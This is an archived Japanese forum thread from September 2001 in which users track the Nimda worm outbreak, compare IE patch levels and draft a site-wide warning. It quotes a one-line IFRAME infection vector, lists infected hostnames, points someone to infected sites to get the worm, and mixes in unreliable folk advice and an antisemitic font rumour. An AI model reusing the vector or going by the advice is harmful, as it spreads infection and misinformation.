677 :
800 :01/09/19 05:59 ID:0Daot1Bc
678 :
670 :01/09/19 06:01 ID:1rZyLqRQ
>>673 ありがとう。
全部パッチ当ててるハズなのに感染したよって人は結局なんだったんでしょう?
679 :
:01/09/19 06:06 ID:JlX0ElGE
今日、会社が始まると一気に感染拡大しそうだし、 次スレのために一度情報を整理しないかい?
680 :
:01/09/19 06:07 ID:rkXvUCbU
>>679 とりあえず、今日はジャバスクリプト切っとけばいいじゃないか?
681 :
´_ゝ` :01/09/19 06:09 ID:Z8Y9.0wQ
/ ⌒ \ ( ( ̄)_)∧ ∧ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ γ~~ ̄ ̄ (; ゚Д゚) < っていうかよその板の人はこれを知ってるのかな?  ̄ ̄ ̄ ̄ ̄ ̄ \__________
682 :
:01/09/19 06:10 ID:mxUXkeNs
たぶんしらんだろ。
683 :
:01/09/19 06:12 ID:9qe3GPQQ
>>679 整理するなら鯖サイドとクライアントPCの対策法に分けるべきだな。
両方がごっちゃになるのはイヤン
684 :
´_ゝ` :01/09/19 06:12 ID:Z8Y9.0wQ
∧⊂ヽ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ (゚ω゚)ノ< 無意味に知らせてみるね。 | ⊃| \_______ | | ⊂ノ〜 ∪
685 :
:01/09/19 06:13 ID:p.HEhtZM
686 :
Zone Alarm警告すごい :01/09/19 06:14 ID:lQaTfxhA
>682 ネットワークセキュリティ板は、「MSNでウイルス感染!?」あるよ
687 :
:01/09/19 06:16 ID:JlX0ElGE
688 :
:01/09/19 06:17 ID:mxUXkeNs
しかし韓国からが異様に多いな
689 :
510 :01/09/19 06:18 ID:DVcxGGFA
ど〜もでした。 ちなみに、ZAのアクセスは、61.179.112.66からでした。 ほかにもあったのですが、すべて、Asia Pacific Network Information Center みたいです。 んじゃ寝ます。
690 :
:01/09/19 06:21 ID:mxUXkeNs
691 :
:01/09/19 06:24 ID:mxUXkeNs
692 :
:01/09/19 06:26 ID:2TsSc8Ks
Internet Explorer 5.01 Service Pack 2 のマシンの人はどうですか?
693 :
687 :01/09/19 06:26 ID:JlX0ElGE
694 :
:01/09/19 06:27 ID:9qe3GPQQ
MSNは最新パッチあててなかったのかな・・・信じられん。 Nimdaは新しい穴をついてるような気がしてならんのは、 漏れだけか?
695 :
:01/09/19 06:27 ID:zF0vrHpU
5.00の対処方法も教えてくんなまし
696 :
:01/09/19 06:28 ID:mxUXkeNs
697 :
´_ゝ` :01/09/19 06:28 ID:Z8Y9.0wQ
スレッド立てずに適当にアナウンスしただけだと 返事が無かったよ・・・。 ∧ ∧ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ( ,,) < ちぇっ! /⊃⊂ \______________ 〜( _つ し' ミ o
698 :
:01/09/19 06:29 ID:mxUXkeNs
>>695 IE5.5SP2 or IE6入れてくれ。
699 :
695 :01/09/19 06:32 ID:zF0vrHpU
すでに感染した模様ですw
700 :
:01/09/19 06:34 ID:mxUXkeNs
>>699 感染したらメール勝手に送るから恥かしいぞ。
701 :
:01/09/19 06:35 ID:mxUXkeNs
>>697 たぶん モナー板とか
ズレるからとかいう理由でIE古いまま使用してる人多そうなので
怖いなー。
702 :
:01/09/19 06:35 ID:rkXvUCbU
703 :
:01/09/19 06:36 ID:OmhilR7Q
>>697 うちには来てないぞー。
全部の板に布教してくれ。
ダウンロ−ドメッセ−ジが出てこなかった。 よく解らんがOffice2000が壊れた気がする。 何度再起動してもメモリ−または リソ−ス不足だってよ・・・
705 :
:01/09/19 06:38 ID:mxUXkeNs
だから 見に行くなってば IE5.5 SP2 以上で見に行くならいけ
706 :
仕様書無しさん :01/09/19 06:39 ID:PgB291s2
>>687 JavaScriptを切っていても感染させる方法はある。
<IFRAME SRC="readme.eml"> でいけるはず。
設定で仮対処するなら、インターネットオプションのセキュリティ設定の
「ファイルのダウンロード」を「無効にする」に設定しれ。
707 :
606 :01/09/19 06:39 ID:Z2tMVHHU
>>700 メール送ったかどうかは履歴か何かでわかりますか?
もしメールを送ったような跡がなければ感染してないと思ってもいいんでしょうか。
708 :
:01/09/19 06:39 ID:zF0vrHpU
709 :
ん〜ま :01/09/19 06:40 ID:TWLvHZ.k
おはよ。わー。やっぱすごい事になってるね。 いまテレ東のニュースでやってたよ(^^; 米の司法当局が捜査してるってさ。
710 :
ん〜ま :01/09/19 06:41 ID:TWLvHZ.k
711 :
:01/09/19 06:42 ID:LNEMDmj.
なんかCドライブに変なファイルが自動的に出来てる。 削除してもダメだ。見ちゃいけないの?
712 :
700 :01/09/19 06:43 ID:mxUXkeNs
発病症状: 大量メール送信: MAPIを使って自分自身をREADME.EXEとして送信する ファイル改ざん: 多数の正当なファイルをそれ自身で置き換える パフォーマンス低下: システムをスローダウンさせる 不正アクセス: Cドライブをネットワーク共有する
713 :
名無しさん :01/09/19 06:43 ID:OXIcJTgg
>>500 のサイトを見に行っちゃった者ですが、
見に行っただけでも感染しますか?
初心者なのでスマソ
714 :
:01/09/19 06:44 ID:mxUXkeNs
715 :
:01/09/19 06:45 ID:5ntG1LP.
IE 10.0 ですが、何か?
716 :
ん〜ま :01/09/19 06:45 ID:TWLvHZ.k
717 :
名無しさん :01/09/19 06:46 ID:OXIcJTgg
>>714 713です。IE5.5 ←この事ですか?
718 :
:01/09/19 06:47 ID:rkXvUCbU
719 :
:01/09/19 06:48 ID:n3J57AUw
>>713 可能性あり。
スタートメニュー→検索→ファイルやフォルダを選び、
名前の項目に以下を一行ずつ入力して検索してみる。
*.eml
readme.exe
MEP51B3.TMP.EXE
これで感染の有無がとりあえず判断できる。
720 :
:01/09/19 06:48 ID:lHc6baYY
んあーニュースでやってたのか 見逃した… つーかカルーセル巻きタイーホってネタじゃなかったのか。
721 :
サトポン :01/09/19 06:48 ID:xIyKw0Ro
駆除できた人います?
722 :
ん〜ま :01/09/19 06:48 ID:TWLvHZ.k
いまNHKでやってなかった?
723 :
:01/09/19 06:48 ID:mxUXkeNs
>>714 IEのヘルプ(H)
の中にバージョンがあるのでそれで確認して
更新バージョンのとこにSP2と無かったら終了。感染済み
724 :
´_ゝ` :01/09/19 06:49 ID:Z8Y9.0wQ
| |⌒彡 |冫、) |` / | / 面白いほど反応が無いから寝る。 |/ オヤスミ。
725 :
713 :01/09/19 06:50 ID:OXIcJTgg
>>719 やってみます。再起動させても
「不正処理を行ったので強制終了します」が
バンバンですのですが・・。
726 :
あらら :01/09/19 06:51 ID:RdP1k.Qo
727 :
:01/09/19 06:54 ID:mxUXkeNs
728 :
サトポン :01/09/19 06:55 ID:xIyKw0Ro
駆除は?
729 :
ナナシサン :01/09/19 06:57 ID:NcYZVJw.
>723 IE5.01SP2は? JAVA完全に切ってるから大丈夫だと思うけど。
730 :
:01/09/19 06:58 ID:zF0vrHpU
JAVAの設定にいろんな項目あったけど、どれを切ればいいんですか?
731 :
:01/09/19 06:58 ID:.Bm4WWgE
無効にしとけ。
732 :
ん〜ま :01/09/19 07:01 ID:TWLvHZ.k
とりあえず、readme.exeを検索して全部消せ。 感染してるなら数千ファイル見つかる筈だ。 ■■■やりかた■■■ [スタート]→[検索(F)]→[ファイルやフォルダ(F)]を選択。 名前(N)を「readme.exe」、探す場所(L)を「(C:)」にする。 [検索開始(I)]を押す。 検索が終わったら[編集(E)]→[すべて選択(A)]を選択。 ドラッグしてゴミ箱へ移動(またはファイル削除)。
733 :
ん〜ま :01/09/19 07:02 ID:TWLvHZ.k
判らないならJavaもJavaScriptも無効にしておけ。
734 :
:01/09/19 07:03 ID:zF0vrHpU
再起動したらシステム更新された
735 :
ぺ ◆lPYiMAEY :01/09/19 07:03 ID:vSu45KKY
>730 セキュリティ→レベルのカスタマイズでJava1つとJavaScript3つの 項目、すべて無効にしておくのがよいです。 ついでにActiveXも有効じゃないほうが無難。
736 :
:01/09/19 07:05 ID:iMo0duhA
とりあえず知らせた方がいいの?
737 :
ん〜ま :01/09/19 07:05 ID:TWLvHZ.k
ん?MSN落ちたか?
738 :
名無しさん :01/09/19 07:06 ID:OXIcJTgg
>>732 これで検索してみて、何も無かったら
大丈夫なのでしょうか・・・???
739 :
´_ゝ` :01/09/19 07:08 ID:Z8Y9.0wQ
>>736 モナー板でやったら板違いって怒られた。
自分はほっとく事にした。
鬱だ詩嚢
740 :
:01/09/19 07:08 ID:lHc6baYY
>>735 無難つーかアレこそ危ないんじゃないの?
741 :
:01/09/19 07:09 ID:k7k05Jsw
>>737 ずっと落ちたまま。
一度は対策去れたように見えたんだけどね。再度やられたんでしょう。
742 :
:01/09/19 07:11 ID:iMo0duhA
>739 そんなに心配いらないってことですか?
743 :
:01/09/19 07:12 ID:mxUXkeNs
744 :
:01/09/19 07:13 ID:n3J57AUw
745 :
:01/09/19 07:14 ID:lHc6baYY
>>739 最近のモナ板はなぁ…アレだから…
まぁ、元気出せ
746 :
´_ゝ` :01/09/19 07:15 ID:Z8Y9.0wQ
747 :
a :01/09/19 07:17 ID:.fiGEbzU
a
748 :
おい!!!! :01/09/19 07:17 ID:TKCv26Vk
このサーバーもやられてるよ!!!!!! このページのソースの最期のとこ、見てみろ!!!! Javaを、いますぐ切れ!!!!!!!
749 :
´_ゝ` :01/09/19 07:17 ID:Z8Y9.0wQ
>>745 ありがとう〜
レスのみにしてたけどあんまり反応ないから
ついついスレッド立てちゃった・・・。
∧ ∧ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| ̄ ̄( ゚Д゚) ̄ ̄| < ホントにおやすみ〜。
|\⌒⌒⌒⌒⌒⌒\ \
| \ \  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
\ |⌒⌒⌒⌒⌒⌒|
\ |_______|
750 :
:01/09/19 07:18 ID:mxUXkeNs
24どころじゃないよ。 当方の管理するサーバーへのアタークリストみてユニークipリストだしてみたら 292ユニークバカ鯖もあったよ 感染したサーバーリスト作ろうかなって犠牲者増えるだけか。
751 :
:01/09/19 07:22 ID:4BKwkQrw
IEよりJavaVMのバージョンを確認しなさい
752 :
:01/09/19 07:23 ID:mxUXkeNs
JAVA VMは関係ないだろ
753 :
:01/09/19 07:25 ID:mxUXkeNs
Microsoft Internet Explorer 5.01, 5.01 Service Pack 1, 5.5, 5.5 Service Pack 1 for Windows 2000 Microsoft Internet Explorer 5.01, 5.01 Service Pack 1, 5.5, 5.5 Service Pack 1 for Windows 95 Microsoft Internet Explorer 5.01, 5.01 Service Pack 1, 5.5, 5.5 Service Pack 1 for Windows 98 Microsoft Internet Explorer 5.01, 5.01 Service Pack 1, 5.5, 5.5 Service Pack 1 for Windows 98 Second Edition Microsoft Internet Explorer 5.01, 5.01 Service Pack 1, 5.5, 5.5 Service Pack 1 for Windows NT 4.0 Microsoft Internet Explorer 5.5, 5.5 Service Pack 1 for Windows Millennium Edition 該当するIEで感染サイト見たら終了。
754 :
:01/09/19 07:25 ID:UQOQrnT6
あげ
755 :
:01/09/19 07:27 ID:zF0vrHpU
5.00はどうですか?
756 :
:01/09/19 07:28 ID:tw0Lh73E
IE4.01sp2は、もうだめ?
757 :
ぺ ◆lPYiMAEY :01/09/19 07:29 ID:vSu45KKY
>755 >756 合掌・・・ てゆーか、何でパッチ当てたりバージョンアップしないの?
758 :
ぱそ :01/09/19 07:29 ID:kRB.GSjk
パート2作って、警告しよう。 テレホなんで落ちます。スマソ
759 :
:01/09/19 07:31 ID:mxUXkeNs
テストしたバージョン : マイクロソフトは Internet Explorer 5.01 および 5.5 のテストを行い、この脆弱性による影響を評価しました。それ以前のバージョンに関してはサポートしておらず、この脆弱性による影響は不明です。 たぶんダメなんじゃねーの?
760 :
:01/09/19 07:32 ID:lHc6baYY
そろそろ○○は笑えた!のコピペが出るかなぁ〜?
761 :
仕様書無しさん :01/09/19 07:33 ID:PgB291s2
NHK、ニュース流せ! 会社に行ったらOutlook起動する前にIE5.5SP2にアップグレードするように って。
762 :
:01/09/19 07:35 ID:lHc6baYY
>>761 つーかしたいんだけど、今しに逝っても大丈夫?
763 :
:01/09/19 07:35 ID:tw0Lh73E
ははぁ。 やっぱりIE4はだめっぽいですか。 ありがとうございました。
764 :
:01/09/19 07:37 ID:zF0vrHpU
NHKでマカラニアン
765 :
:01/09/19 07:39 ID:k7k05Jsw
>>762 windowsupdate.microsoft.comは大丈夫みたいだ。
766 :
仕様書無しさん :01/09/19 07:39 ID:PgB291s2
>>762 なんでダメよ?
msn.co.jp は止めてくれてるんだし(w
767 :
:01/09/19 07:40 ID:c8TN3jcQ
ネスケのキャッシュにemlあったけど、削除したら問題なし? IEはJAVAもJavaScriptもダウンロードも 無効にしてるけどIE5.5SP2以上じゃないとやられる? 初心者でスマソ、、、
768 :
名称未設定 :01/09/19 07:41 ID:6HMLdPMA
あ〜、マカーでよかったよ。
769 :
:01/09/19 07:42 ID:mxUXkeNs
770 :
:01/09/19 07:42 ID:lHc6baYY
>>765 -766
怖くて動けないのよ
大丈夫っつーなら逝ってくるよ
771 :
nanana :01/09/19 07:43 ID:WA2G94fs
なんか思ったより静かですね。
772 :
769 :01/09/19 07:44 ID:mxUXkeNs
すくなくとも 769で落とせば大丈夫だ
773 :
:01/09/19 07:45 ID:mxUXkeNs
どれどれ サーバーの様子みてくるか。 会社が始まりだしたぐらいの時間のときに酷いことになりそう
774 :
:01/09/19 07:45 ID:zF0vrHpU
サービスパックって何?
775 :
:01/09/19 07:45 ID:3a7d5RBQ
>>770 なんで人に頼るんだよ。
自分で判断しろ。
そんなに怖かったらformatでもしとけ
776 :
仕様書無しさん :01/09/19 07:45 ID:PgB291s2
NHKーー臨時ニューーーースやれーーー それで何万人かが救われるぞ。 台風情報もいいけどな、これも重要だろ! 後から報道したって遅いんだぞ。
777 :
:01/09/19 07:46 ID:mxUXkeNs
778 :
:01/09/19 07:50 ID:k7k05Jsw
view-source: で見た限り、windowsupdate.microsoft.com は 感染してないようだよ。サービスパックいれとけ。 さて、そろそろ出勤するか。会社はどうなってるかな。(w
779 :
800 :01/09/19 07:50 ID:9CIBvpUc
780 :
:01/09/19 07:52 ID:rkXvUCbU
サービスパックって・・・・ パッチの最終系だっけ?こんな感じ?? 緊急修正パッチ→ウィンドウズアップデータ→サービスパック 違うかな?(^^;)
781 :
:01/09/19 07:53 ID:mxUXkeNs
適当にひろってきたよー やられたとこ siu-s005.suzuka-iu.ac.jp dns1.astr.co.jp ns.kohken-net.co.jp fw075.rosenet.ne.jpdns1.ybk.co.jp www.atc.ne.jp www.informarc.co.jp www.totsumedia.co.jp www.dreamgate.ne.jp proxy.jbc.ac.jp oceansv.ocean.ne.jp
782 :
:01/09/19 07:55 ID:M/ujvCtU
だれか整理してくれ〜 サーバはWiindows2000SP2 ブラウザはIE5.5SP2 でとりあえず安全ってことでいいの?
783 :
:01/09/19 07:56 ID:mxUXkeNs
IISを運用するサーバーはSP2でもだめかもしれない もうちょっと検証しないとわかんない。 ブラウザはIE5.5SP2で良い
784 :
:01/09/19 07:57 ID:3a7d5RBQ
これからはIE2がいいかもな。
785 :
マァヴ ★ :01/09/19 07:58 ID:???
こりゃなんかかなりキツいね・・・・ SP1以前のユーザーって多そうだし(^_^;)警告出した方がいいかな? 誰か情報をまとめてもらえると嬉しいな。サイトの形で(^_^;)
786 :
>782 :01/09/19 07:58 ID:/VCvAzwc
取りあえず、しばらくはJavaScript切っておく ほうがいいんじゃないの。 まだ、完璧にウィルスの正体がわかったわけでもないし、 これから、他のテロ関係のウィルスが出てくるかもしれんし。 ちなみに、中国ってイラクにレーダー網とかの援助とか してんだよね。江沢民が、アメリカを支持するとか ほざいてるけど、結局、あいつらもテロの一翼を になってるのに。
787 :
:01/09/19 07:59 ID:rkXvUCbU
>>782 今のところ、
*.eml
readme.exe
MEP51B3.TMP.EXE
この3つのファイルを検索してみて無ければ大丈夫じゃないか?
788 :
トレンドミクロ :01/09/19 08:00 ID:ZmP.Bp1Q
大きなデマだな〜
789 :
名無しさん@MZ-2000 :01/09/19 08:00 ID:M/ujvCtU
790 :
:01/09/19 08:01 ID:rkXvUCbU
791 :
:01/09/19 08:02 ID:mxUXkeNs
ぷぷ www.informarc.co.jp 「当ページはNetscape 3.0以上 Internet Explorer 4.0以上でご覧ください 」 の文字がむなしいなー。 あ 見ちゃだめよ ウツルから。
792 :
マァヴ ★ :01/09/19 08:03 ID:???
>>789 なんだけどさ。
それこそ速報的に警戒を呼びかけたり、チェック方法を伝えたり
不確定ながら現状を伝えられれば2chも役に立つじゃん(^_^;)。
もし用意してもらえるなら各板のTOPにデカデカと「警告」っていうリンク貼って
衆知させるってのはどうかなと・・・・。
793 :
:01/09/19 08:04 ID:mxUXkeNs
兎に角、IE5.5SP2にしろ!!! ごたごた言うなって事でどうですか? Java切れだのなんだの指導は。だるぃ。
794 :
:01/09/19 08:04 ID:rkXvUCbU
795 :
マァヴ ★ :01/09/19 08:05 ID:???
796 :
いてて :01/09/19 08:06 ID:ZmP.Bp1Q
W32.Nimda.A@mm
発見日: 2001年9月18日
Symantec Security Responseは、W32.Nimda.A@mmの被害報告が数
多く寄せられていることから、このワームの危険度を4と評価します。
W32.Nimda.A@mmは、多数の感染方法を持つ新しい大量メール送信の
ワームです。ワームは電子メールで自分自身を送り、有効なネットワ
ーク共有を捜して、修正プログラムが適用されていないMicrosoft I
IS Web サーバにワーム自身をコピーしようと試みます。ワームはUn
icode Web Traversal と呼ばれるセキュリティホールを使ってこれ
を行います。この脆弱性に対する修正プログラムと情報は下記のペー
ジをご覧下さい。
http://www.microsoft.com/japan/technet/security/prekb.asp? sec_cd=MS00-078
W32.Nimda.A@mmは、電子メールを使って感染を広げる新しい大量メー
ル送信ワームです。それは、readme.exeという添付ファイルで届きま
す。
危険にさらされた Web サーバを訪問しているユーザは、.EML (Outl
ook Express)電子メールファイルをダウンロードするよう促されるで
しょう。そしてそれは添付ファイルとしてとしてワームを含んでいま
す。
また、ワームはシステムへのアクセスを許可するためにネットワーク
共有を有効にします。
797 :
:01/09/19 08:06 ID:mxUXkeNs
798 :
いてて :01/09/19 08:07 ID:ZmP.Bp1Q
危険にさらされた Web サーバを訪問しているユーザは、.EML (Outl ook Express)電子メールファイルをダウンロードするよう促されるで しょう。そしてそれは添付ファイルとしてとしてワームを含んでいま す。 また、ワームはシステムへのアクセスを許可するためにネットワーク 共有を有効にします。
799 :
マァヴ ★ :01/09/19 08:08 ID:???
>>797 そりゃそうだ(^_^;)っていうか、そうであってほしい・・・・
800 :
名無しさん@MZ-2000 :01/09/19 08:08 ID:M/ujvCtU
>>792 なるほど、情報の速い2chならではってことですね。
でも現状でどこまでまとめられるか…?
とりあえずわたしはこれから出勤なので(ぉ
801 :
いてて :01/09/19 08:09 ID:ZmP.Bp1Q
ネットワーク共有を勝手に有効にするからチェックしとけ
802 :
:01/09/19 08:11 ID:mxUXkeNs
toマァヴ WEBを見るだけで感染するウイルスが昨夜から自己増殖しております。 2chとしましては技術云々はどうでも良いので、何がなんだか わからない人はインターネットエクスプローラーSP2に バージョンをあげる事によって 「見ただけで感染」は防げます、その後も WEBから不信なプログラムをダウンロード しない事をお勧めいたします、 #ブラクラはリセットすりゃなおるが #これはリンクされただけでフォーマットしないとだめだしのう。
803 :
マァヴ ★ :01/09/19 08:12 ID:???
>>800 でしょ?(^_^;)
こういう場合はマスコミなんかより圧倒的に速いし、情報の鮮度高いのが2chだもんね。
全板で告知すれば、強力なニュースサイトに化けるって、さっき気がついたりなんかして(^_^;)
今回は間に合わなくても、そういう体勢作っとくってのはありだよね。
>>780 パッチ→hotfix→サービスパックの順。
パッチはMicrosoftのサポートに連絡したときにMicrosoft側の判断により
提供されるもので、一般には公開されない。インストーラさえ用意されていない
ことが多い上、応急措置であるため。
805 :
ななしさん :01/09/19 08:12 ID:Kf6fOiQo
url開かないよ??
806 :
:01/09/19 08:13 ID:SAfZyXqc
( ´∀`)y-〜 Winは大変だ……
>>805 > 36 bytes from as8069.ix.jpix.ad.jp (210.171.224.116): Communication prohibited for icmp_seq=9
だってさー。ネットワーク的に切られているっぽい。(どこで切れてるかは知らないけど)
808 :
名無しさん@MZ-2000 :01/09/19 08:14 ID:M/ujvCtU
809 :
ななしさん :01/09/19 08:14 ID:Kf6fOiQo
810 :
マァヴ ★ :01/09/19 08:14 ID:???
>>802 WEBを見るだけで感染するウイルス(Windows向け)が
昨夜(9/18)から自己増殖しております。
2chとしましては技術云々はどうでも良いので
何がなんだかわからない人はインターネットエクスプローラーSP2に
バージョンをあげる事によって「見ただけで感染」は防げます。
その後もWEBから不信なプログラムをダウンロードしない事をお勧めいたします、
WindowsUpDateへのリンク
#ブラクラはリセットすりゃなおるが
#これはリンクされただけでフォーマットしないとだめだしのう。
811 :
:01/09/19 08:16 ID:2vsBThxg
見損なったぞNHK! ビジネスマン達はもう出勤しちゃっただろうよ。 もう受信料は払わなくていいね。
812 :
名無しさん@MZ-2000 :01/09/19 08:17 ID:M/ujvCtU
>>803 ただ憶測とデマの飛び交う 2ch でどこまでやれるかという
のもあると思うですが(w
とりあえず板トップにこのスレ (もしくは次スレ) へのリンク
を貼るというのはアリかもしれないですね。
813 :
これって :01/09/19 08:18 ID:IWxhyzsE
JAVAを新しい奴に変えればいいの?
>>809 ついでなんて簡単に調べてみた。
jpix.ad.jpってのは日本のインターネットの中枢的な場所で、
おそらくmsnはソコから直接接続していると思う。msn側で意図的に
切ったのか、それともjpixが切ったのかは判らないが、
とりあえず被害をくい止める良い方法なのではないかと。
815 :
:01/09/19 08:18 ID:mxUXkeNs
toマァヴ WEBを見るだけで感染するウイルス(Windows向け)が 昨夜(9/18)から各地のWEBへ自己増殖しております。 ~~~~~~~~~~~~~~~~~~ 各自WindowsUpdateを行なってください で良いかな リンク先ってWindows98 2K Meによって違うし。
>>813 IEのバージョンを最新のモノ(IE5.5 SP2)にする。
あとはWindows Updateで引っかかるモノは全て入れる。
817 :
:01/09/19 08:20 ID:mxUXkeNs
JAVAは関係ないですMIMEヘッダーに関する糞バグです。
818 :
( ´Д`) :01/09/19 08:21 ID:MmI/Ry9g
あーあ、ごみ箱にとっておいたのに、 PC Cillin(ウイルスバスターの英語版)をUPDATEしたら 隔離されちゃったョ。フロッピーにとっておけばよかったな。
820 :
マァヴ ★ :01/09/19 08:23 ID:???
■緊急セキュリティ情報■ WEBを見るだけで感染するウイルス(Windows向け)が 昨夜(9/18)から自己増殖しております。 2chとしましては技術云々どうでも良いので 何がなんだかわからない人はインターネットエクスプローラーSP2に バージョンをあげる事によって「見ただけで感染」は防げます。 各自WindowsUpdateを行ない、その後もWEBから 不信なプログラムをダウンロードしない事を強くお勧めいたします、 #ブラクラはリセットすりゃなおるが #これはリンクされただけでフォーマットしないとだめだしのう。
821 :
:01/09/19 08:25 ID:mxUXkeNs
>>819 けど コリアンも引っかかってたな 流行の自爆かな
822 :
マァヴ ★ :01/09/19 08:28 ID:???
すまん(^_^;)なんかミスった
823 :
:01/09/19 08:28 ID:mxUXkeNs
>>to マァヴ 早く張ろう 時間が勝負だねー。
824 :
マァヴ ★ :01/09/19 08:28 ID:???
てすと
825 :
:01/09/19 08:28 ID:mxUXkeNs
うむ。 cgi error出てた(藁
826 :
お前名無しだろ :01/09/19 08:29 ID:g/qQyg7Y
>820 >#これはリンクされただけでフォーマットしないとだめだしのう。 この1行が意味不明なんすけど。「リンクされただけで」?
827 :
マァヴ ★ :01/09/19 08:29 ID:???
張った(^_^;)
828 :
マァヴ ★ :01/09/19 08:30 ID:???
こんなもんで(^_^;)無難だけど
829 :
:01/09/19 08:31 ID:mxUXkeNs
>>826 悪意を持ったリンクへ飛んだだけで の間違いだ すまん。
830 :
名無し :01/09/19 08:32 ID:Kf6fOiQo
>>マァヴ おつヵれです。
831 :
:01/09/19 08:33 ID:mxUXkeNs
www.2ch.net/iyan.html のほうが アピールは強いかも。各方面へ いろんな意味で。
832 :
:01/09/19 08:34 ID:CIjuhvgQ
>>マァヴさん お疲れ様です。
833 :
おいおい :01/09/19 08:35 ID:gBmvSPfc
昨日から俺のPCおもいきり調子悪い・・・というか今日修理にでも出そうかと思ってるんだけど もしかしてこれのせい?? 症状はどんななの??
834 :
マァヴ ★ :01/09/19 08:36 ID:???
多分、chocoサーバ(モ板系のみ)以外は全部更新したはず・・・ chocoは不正アクセスできない・・・・(^_^;) 気が向いたら確認なんかしてみて。
835 :
:01/09/19 08:39 ID:92M.7136
このスレのじゃないけど 例のヤツ、JavaScriptのかわいらしいアラートが出るだけで 別になんともならないよ。 外観で言ってるんじゃなくて なんともなってない。
836 :
:01/09/19 08:42 ID:H/IkjDPI
>>834 シマンテックのウイルス情報ページへのリンクも張った方が
いいのではないですか?
837 :
:01/09/19 08:42 ID:mxUXkeNs
>>マァヴ mentai かわってなかったり。
838 :
nanashi :01/09/19 08:45 ID:GreQIbVc
IE6でも大丈夫?
839 :
マァヴ ★ :01/09/19 08:46 ID:???
>>836 とりあえずフラッシュってことで・・・・
これから第二報を書きますね(^_^;)
>>837 cgiが更新されてから、なんか書き込まれないと更新されないんです(^_^;)>TOP
840 :
:01/09/19 08:46 ID:mxUXkeNs
IE6だいじょぶ。
841 :
うううう :01/09/19 08:50 ID:yUVQ.6VA
MSNがひらきません
842 :
名無し :01/09/19 08:50 ID:r9Obg67M
ウイルスバスター最新定義入れたら さっそくreadme.exeダウンロードで検出された。
843 :
おいおい :01/09/19 08:50 ID:gBmvSPfc
今5.5SP2、DL中。
844 :
837 :01/09/19 08:50 ID:mxUXkeNs
>>まぁヴ とりあえずasahi.comよりは速かったかのう。 たぶん対応は市万テックが一番早いかなぁ。 とりあえずサーバーのログみると日本が多いんだよね 中国からのアタックと思って間違いなし。
845 :
:01/09/19 08:51 ID:CIjuhvgQ
おぉー、ウィルスバスターもやっと更新されたか・・・。
846 :
名無し :01/09/19 08:53 ID:r9Obg67M
セキュリティ板の有志で解析始めてくれ。
readme.exeくれよ
848 :
マァヴ ★ :01/09/19 08:54 ID:???
てst
849 :
名無し@ひろゆき :01/09/19 08:54 ID:r9Obg67M
>>847 そこらへんのWEB行けばダウンロードが始まるよ。
過去のリンクミロ。
850 :
:01/09/19 08:55 ID:CIjuhvgQ
851 :
マァヴ ★ :01/09/19 08:58 ID:???
第二報エラーが出る(^_^;)とほほ
852 :
きつね :01/09/19 08:58 ID:yPjgNCbo
ウィルスはイイ??
853 :
:01/09/19 09:00 ID:mxUXkeNs
>>851 何書こうとしたのーよ?
おれcgi屋だからなんかアドバイスできるかもーよ?
854 :
きつね :01/09/19 09:03 ID:yPjgNCbo
マァヴさんがいると言う事は、設定変更の前触れかな?
855 :
ああ :01/09/19 09:03 ID:5/A6WfBo
msn復活したね ガイシュツ?
856 :
マァヴ ★ :01/09/19 09:05 ID:???
test
857 :
:01/09/19 09:06 ID:qSOu2Upo
つーか、msn、 マイクロソフト自身がやってるニュースサイトなんだし、 自分も撒き散らしに加担したんだから 責任とってちゃんと速報だせよ・・・ 9/19 09:03現在、それ関連の記事はなんもトップに載ってない。 自分のとこのサーバ直して終わりはねぇだろーよー
さすが2ch!!
859 :
:01/09/19 09:07 ID:5HMS25xw
だから止まってたのか。
860 :
:01/09/19 09:08 ID:CIjuhvgQ
msnはこのまま済ませようと思ってるのか?
861 :
ああ :01/09/19 09:08 ID:5/A6WfBo
862 :
:01/09/19 09:10 ID:qSOu2Upo
どうでもいいけど、俺のID、躁鬱だ。
863 :
:01/09/19 09:12 ID:DMANlpjY
864 :
:01/09/19 09:12 ID:gYqCn1b2
865 :
:01/09/19 09:13 ID:5HMS25xw
>>859 おいらもどうでもいいけど、idがMSだ。
866 :
:01/09/19 09:14 ID:zj6TuvJQ
このままシランプリか?>>MSN いい根性しておる。
867 :
:01/09/19 09:17 ID:KLFjDMZ6
868 :
マァヴ ★ :01/09/19 09:18 ID:???
だめだ(^_^;)URLを埋めこめない・・・・ スキルなくてすまーん。
869 :
31アイスクリーム :01/09/19 09:18 ID:prNHR8MU
YBB以上に事が悪質なんで永久に晒し者かな>MSN
870 :
きつね :01/09/19 09:19 ID:yPjgNCbo
871 :
1 :01/09/19 09:22 ID:mxUXkeNs
872 :
:01/09/19 09:23 ID:mxUXkeNs
おれ1じゃないの。
873 :
:01/09/19 09:24 ID:LNEMDmj.
スタートメニューにupdateが出なくて、 英語も読めない私みたいな人はどうすべきでしょう? 逝くべき?
874 :
:01/09/19 09:24 ID:DyXxlvA.
http://daily.rotten.com/ に書いてあるんだけど、ワードの日本語版でもやったら出来たよ。
やり方はワードを立ち上げて
"NYC"って入れてその文字をドラッグ、書式(c)からフォント、
英数字用のフォント(F)をWingdingsに変えるだけ。
既出だったらスマソ。
フォント変えるだけで、「アイラブニューヨーク」と
「ユダヤ人を殺せ」に変わるってすごいね。マイクロソフト。
875 :
きつね :01/09/19 09:25 ID:yPjgNCbo
876 :
仕様書無しさん :01/09/19 09:26 ID:iaQQZmng
877 :
マァヴ ★ :01/09/19 09:27 ID:???
やってみる。 またとまったらごめん(^_^;)
878 :
名無し :01/09/19 09:29 ID:r9Obg67M
879 :
:01/09/19 09:31 ID:OO3wQbOI
880 :
:01/09/19 09:31 ID:ERPQai/o
881 :
ガシシ右松 :01/09/19 09:32 ID:SLfBFyjc
本当だ! 検索サイトでひっかかった所 行って見たら一発だ! readme.exe出来てた。 俺の、5.5sp2なんだけど大丈夫かな?
882 :
:01/09/19 09:32 ID:8lPNZb5Y
883 :
名無しさん :01/09/19 09:33 ID:xd.89Pkw
*.emlの関連づけを解除すればいいんじゃないの?
884 :
マァヴ ★ :01/09/19 09:34 ID:???
885 :
:01/09/19 09:35 ID:CIjuhvgQ
>>879 そうそう、トップで警告してるのにね。ヽ(´ー`)ノ
886 :
:01/09/19 09:36 ID:mxUXkeNs
>>884 わかった
